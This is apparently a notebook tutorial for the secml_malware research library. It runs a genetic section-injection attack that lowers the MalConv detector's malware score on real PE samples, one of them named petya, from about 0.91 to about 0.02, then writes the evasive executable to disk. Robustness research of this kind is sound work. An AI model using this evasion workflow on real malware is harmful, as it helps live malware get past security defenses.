# Black-box attack Tutorial

In this tutorial, you will learn how to run a black-box attack using the Section Injection practical manipulation.

In [1]:
import os

import magic
import numpy as np
from secml.array import CArray

from secml_malware.attack.blackbox.c_wrapper_phi import CEnd2EndWrapperPhi
from secml_malware.attack.blackbox.ga.c_base_genetic_engine import CGeneticAlgorithm
from secml_malware.models.c_classifier_end2end_malware import CClassifierEnd2EndMalware
from secml_malware.models.malconv import MalConv

net = CClassifierEnd2EndMalware(MalConv())
net.load_pretrained_model()
net = CEnd2EndWrapperPhi(net)

First, we create the network (MalConv) and wrap it in a *CClassifierEnd2EndMalware* model class.
This class generalizes PyTorch end-to-end ML models.
Since MalConv is already implemented inside the plugin, its pretrained weights are bundled as well, and they can be loaded with the *load_pretrained_model* method.

If you wish to use different weights, pass the path to the PyTorch *pth* file to that method.

Then, we wrap it inside a `CEnd2EndWrapperPhi`, an interface that abstracts away the feature extraction phase of the model.
This is needed for the black-box setting of the attack.
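
To make the idea of a black-box setting concrete, here is a minimal sketch of such an interface: the attacker can only submit raw bytes and read back a score. The names `ToyDetector` and `BlackBoxOracle` are hypothetical and are not part of secml_malware, and the scoring rule is invented purely for illustration.

```python
class ToyDetector:
    """Hypothetical stand-in for a model: feature extraction plus scoring."""

    def extract_features(self, raw: bytes) -> float:
        # Toy feature: fraction of 0xCC bytes in the file
        return raw.count(0xCC) / max(len(raw), 1)

    def score(self, feature: float) -> float:
        # Toy decision function: more 0xCC bytes means "more malicious"
        return min(1.0, 2.0 * feature)


class BlackBoxOracle:
    """Exposes only bytes -> score, hiding feature extraction from the caller."""

    def __init__(self, detector: ToyDetector) -> None:
        self._detector = detector
        self.queries = 0  # black-box attacks are usually judged by query count

    def __call__(self, raw: bytes) -> float:
        self.queries += 1
        return self._detector.score(self._detector.extract_features(raw))


oracle = BlackBoxOracle(ToyDetector())
original = bytes([0xCC] * 60 + [0x00] * 40)
padded = original + bytes(100)  # appended zero bytes dilute the toy feature

print(oracle(original), oracle(padded), oracle.queries)
```

The attack code never touches `extract_features` directly; it only sees the score returned by the oracle, which is the role the wrapper plays for the real model.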

In [2]:
from secml_malware.attack.blackbox.c_gamma_sections_evasion import CGammaSectionsEvasionProblem
goodware_folder = 'secml_malware/data/goodware_samples' #INSERT GOODWARE IN THAT FOLDER
section_population, what_from_who = CGammaSectionsEvasionProblem.create_section_population_from_folder(goodware_folder, how_many=10, sections_to_extract=['.rdata'])

attack = CGammaSectionsEvasionProblem(section_population, net, population_size=10, penalty_regularizer=1e-6, iterations=10, threshold=0)

For the section injection attack implemented with GAMMA, we first need to extract sections from the goodware samples.
Then, we create a `CGammaSectionsEvasionProblem` object, which contains the attack.
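
The following is a toy sketch of the kind of search a genetic section-injection attack performs, written without secml_malware so that it runs on its own. It assumes a made-up detector (`toy_score`), treats each candidate as a vector of fractions saying how much of each benign section to append, and minimizes the score plus a size penalty. All function names here are hypothetical; the parameter names only mirror `population_size`, `iterations` and `penalty_regularizer` from the cell above, and the actual GAMMA implementation may differ in its operators and details.

```python
import random
from typing import List, Sequence, Tuple


def toy_score(raw: bytes) -> float:
    """Hypothetical detector: fraction of 0xCC bytes (not a real model)."""
    return raw.count(0xCC) / max(len(raw), 1)


def inject(malware: bytes, sections: Sequence[bytes], t: Sequence[float]) -> bytes:
    """Append the first t[i] fraction of each benign section to the sample."""
    payload = b"".join(s[: int(ti * len(s))] for s, ti in zip(sections, t))
    return malware + payload


def objective(malware: bytes, sections: Sequence[bytes],
              t: Sequence[float], penalty: float) -> float:
    adv = inject(malware, sections, t)
    # Detector score plus a penalty proportional to the injected bytes
    return toy_score(adv) + penalty * (len(adv) - len(malware))


def genetic_search(malware: bytes, sections: Sequence[bytes],
                   population_size: int = 10, iterations: int = 10,
                   penalty: float = 1e-6, seed: int = 0
                   ) -> Tuple[List[float], List[float]]:
    rng = random.Random(seed)
    k = len(sections)

    def fitness(t: Sequence[float]) -> float:
        return objective(malware, sections, t, penalty)

    population = [[rng.random() for _ in range(k)] for _ in range(population_size)]
    history = []
    for _ in range(iterations):
        population.sort(key=fitness)
        history.append(fitness(population[0]))
        parents = population[: max(2, population_size // 2)]
        children = [parents[0]]  # elitism: the best candidate always survives
        while len(children) < population_size:
            a, b = rng.sample(parents, 2)
            child = [rng.choice(pair) for pair in zip(a, b)]  # uniform crossover
            i = rng.randrange(k)  # mutate one gene, clipped to [0, 1]
            child[i] = min(1.0, max(0.0, child[i] + rng.gauss(0.0, 0.1)))
            children.append(child)
        population = children
    best = min(population, key=fitness)
    history.append(fitness(best))
    return best, history


malware = bytes([0xCC]) * 200
sections = [bytes(100), bytes(100), bytes(100)]  # stand-ins for benign sections
best, history = genetic_search(malware, sections)
print(toy_score(malware), toy_score(inject(malware, sections, best)))
```

Because the best candidate is carried over unchanged at every generation, the recorded objective never increases, and the size penalty discourages injecting more bytes than needed.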

In [3]:
folder = 'secml_malware/data/malware_samples/test_folder'  #INSERT MALWARE IN THAT FOLDER
X = []
y = []
file_names = []
for f in os.listdir(folder):
    path = os.path.join(folder, f)
    # Skip anything that libmagic does not identify as a PE32 executable
    if "PE32" not in magic.from_file(path):
        continue
    with open(path, "rb") as file_handle:
        code = file_handle.read()
    x = CArray(np.frombuffer(code, dtype=np.uint8)).atleast_2d()
    _, confidence = net.predict(x, True)

    # Malware confidence is the score of class 1
    conf = confidence[0, 1].item()
    # Keep only the samples that the network already detects as malware
    if conf < 0.5:
        continue

    print(f"> Added {f} with confidence {conf}")
    X.append(x)
    y.append([1 - conf, conf])
    file_names.append(path)

> Added p2.file with confidence 0.9112256765365601
> Added petya.file with confidence 0.9112256765365601
> Added p1.file with confidence 0.9112256765365601


We load a simple dataset from the `malware_samples/test_folder` that you have filled with malware to test the attacks.
We discard all the files that are not PE32 executables, as well as the samples that the network does not already detect as malware (confidence below 0.5).
The `CArray` class is the base object you will handle when dealing with vectors in this library.
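
As a rough illustration of what the PE filter checks, the sketch below tests the two signatures of a PE file by hand: the `MZ` marker at the start and the `PE\0\0` signature at the offset stored at `0x3C`. The helper names `looks_like_pe` and `make_fake_pe` are hypothetical; this is only an approximation of what libmagic reports, not a replacement for the `magic.from_file` call used above.

```python
import struct


def looks_like_pe(raw: bytes) -> bool:
    """Return True if the buffer carries the DOS and PE signatures."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    # e_lfanew: little-endian 32-bit offset of the PE header, stored at 0x3C
    (pe_offset,) = struct.unpack_from("<I", raw, 0x3C)
    return raw[pe_offset:pe_offset + 4] == b"PE\x00\x00"


def make_fake_pe() -> bytes:
    """Build a minimal buffer with valid signatures (not a runnable program)."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    header[0x40:0x44] = b"PE\x00\x00"
    return bytes(header)


print(looks_like_pe(make_fake_pe()))         # True
print(looks_like_pe(b"not an executable"))   # False
```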

In [4]:
engine = CGeneticAlgorithm(attack)
for sample, label in zip(X, y):
    y_pred, adv_score, adv_ds, f_obj = engine.run(sample, CArray(label[1]))
    print(engine.confidences_)
    print(f_obj)

[0.9112256765365601, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433, 0.002221981529146433]
0.002221981529146433
[0.9112256765365601, 0.031418055295944214, 0.031418055295944214, 0.05943218246102333, 0.027438974007964134, 0.027438974007964134, 0.027438974007964134, 0.03099643439054489, 0.03099643439054489, 0.023107970133423805, 0.023107970133423805, 0.023107970133423805]
0.023107970133423805
[0.9112256765365601, 0.02237715944647789, 0.036044590175151825, 0.036044590175151825, 0.03532141447067261, 0.026757843792438507, 0.026757843792438507, 0.026757843792438507, 0.021750085055828094, 0.021750085055828094, 0.021750085055828094, 0.019729789346456528]
0.019729789346456528
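
The printed traces can be summarized with a small helper like the one below. It is a sketch that assumes the first entry of a trace is the confidence of the unmodified sample and the last entry is the confidence at the end of the search, which is how the output above reads. The `summarize_trace` name is hypothetical, and the 0.5 threshold simply mirrors the filter used when loading the samples.

```python
def summarize_trace(confidences, threshold=0.5):
    """Compare the first and last malware confidence recorded for one sample."""
    initial, final = confidences[0], confidences[-1]
    return {
        "initial": initial,
        "final": final,
        "drop": initial - final,
        "evaded": final < threshold,  # assumed decision threshold
    }


# Trace of the third sample, copied from the output above
trace = [0.9112256765365601, 0.02237715944647789, 0.036044590175151825,
         0.036044590175151825, 0.03532141447067261, 0.026757843792438507,
         0.026757843792438507, 0.026757843792438507, 0.021750085055828094,
         0.021750085055828094, 0.021750085055828094, 0.019729789346456528]

print(summarize_trace(trace))
```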


Inside the `adv_ds` object, you can find the adversarial example computed by the attack.
You can reconstruct the functioning example by using a specific function inside the plugin:

In [5]:
adv_x = adv_ds.X[0,:]
engine.write_adv_to_file(adv_x,'adv_exe')
with open('adv_exe', 'rb') as h:
    code = h.read()
real_adv_x = CArray(np.frombuffer(code, dtype=np.uint8))
_, confidence = net.predict(CArray(real_adv_x), True)
print(confidence[0,1].item())

0.026793455705046654


... and you're done!
If you want to create a real sample (stored on disk), have a look at the `create_real_sample_from_adv` method of each attack. It accepts a third string argument that is used as the destination file path for storing the adversarial example.